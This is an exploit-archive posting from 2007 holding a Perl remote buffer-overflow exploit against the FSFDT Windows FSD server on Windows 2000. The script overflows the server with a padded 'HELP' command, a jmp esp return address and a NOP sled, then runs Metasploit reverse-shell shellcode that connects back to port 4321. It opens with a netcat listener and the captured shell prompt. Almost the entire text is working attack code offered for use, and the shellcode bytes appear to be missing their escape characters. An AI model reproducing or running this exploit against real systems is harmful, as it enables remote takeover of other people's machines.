fsfdt-overflow.txt
Posted on 05 October 2007
# ~$ nc -l -p 4321 # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # E:draftfsd1110windows>_ # # ------------------------------------------- #!/usr/bin/perl # FSFDT remote exploit by weak[at]fraglab.at # spawns reverse shell to 10.0.0.100:4321 # tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4 use IO::Socket; if( $#ARGV < 1 ) { print "usage: perl ".$0." <ip> <port>"; exit(); } my $ip = $ARGV[0]; my $port = $ARGV[1]; print "connecting... "; my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', ); die "could not create socket: $! " unless $sock; # jmp esp in KERNEL32.DLL 5.0.2195.7006 my $jmpesp = "xB7x49xE7x77"; # encoded 'jmp 0x400' to jump to stage2 my $jmpcode = "xebx11x5ex31xc9xb1x1ex80x6cx0exffx35x80xe9x01". "x75xf6xebx05xe8xeaxffxffxffx0ex16x0ex69x59x8d". "x8dx8dx8dxb5x1dx1cx66xfex9bxb6x1ex30x34xb5x65". "x36x75x17x2fx1dx36x3ax36x36"; # win32_reverse - EXITFUNC=thread LHOST=10.0.0.2 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com # bad chars: 0x00 0x0A 0x0D 0x20 0x29 my $shellcode = "x2bxc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13x1e". "x2ax6ex8fx83xebxfcxe2xf4xe2x40x85xc2xf6xd3x91x70". "xe1x4axe5xe3x3ax0exe5xcax22xa1x12x8ax66x2bx81x04". "x51x32xe5xd0x3ex2bx85xc6x95x1exe5x8exf0x1bxaex16". "xb2xaexaexfbx19xebxa4x82x1fxe8x85x7bx25x7ex4axa7". "x6bxcfxe5xd0x3ax2bx85xe9x95x26x25x04x41x36x6fx64". "x1dx06xe5x06x72x0ex72xeexddx1bxb5xebx95x69x5ex04". "x5ex26xe5xffx02x87xe5xcfx16x74x06x01x50x24x82xdf". "xe1xfcx08xdcx78x42x5dxbdx76x5dx1dxbdx41x7ex91x5f". "x76xe1x83x73x25x7ax91x59x41xa3x8bxe9x9fxc7x66x8d". "x4bx40x6cx70xcex42xb7x86xebx87x39x70xc8x79x3dxdc". "x4dx69x3dxccx4dxd5xbexe7x14x2ax6exebx78x42x7ex6e". "x78x79xe7x6ex8bx42x82x76xb4x4ax39x70xc8x40x7exde". "x4bxd5xbexe9x74x4ex08xe7x7dx47x04xdfx47x03xa2x06". "xf9x40x2ax06xfcx1bxaex7cxb4xbfxe7x72xe0x68x43x71". "x5cx06xe3xf5x26x81xc5x24x76x58x90x3cx08xd5x1bxa7". "xe1xfcx35xd8x4cx7bx3fxdex74x2bx3fxdex4bx7bx91x5f". "x76x87xb7x8axd0x79x91x59x74xd5x91xb8xe1xfax06x68". "x67xecx17x70x6bx2ex91x59xe1x5dx92x70xcex42x81x41". "xfex4ax3dx70xc8xd5xbex8f"; print "sending payload... "; print $sock "HELP " . "A"x200 . $jmpesp . "x90"x8 . $jmpcode . " " . "x90"x400 . $shellcode; close($sock); print "done. ";
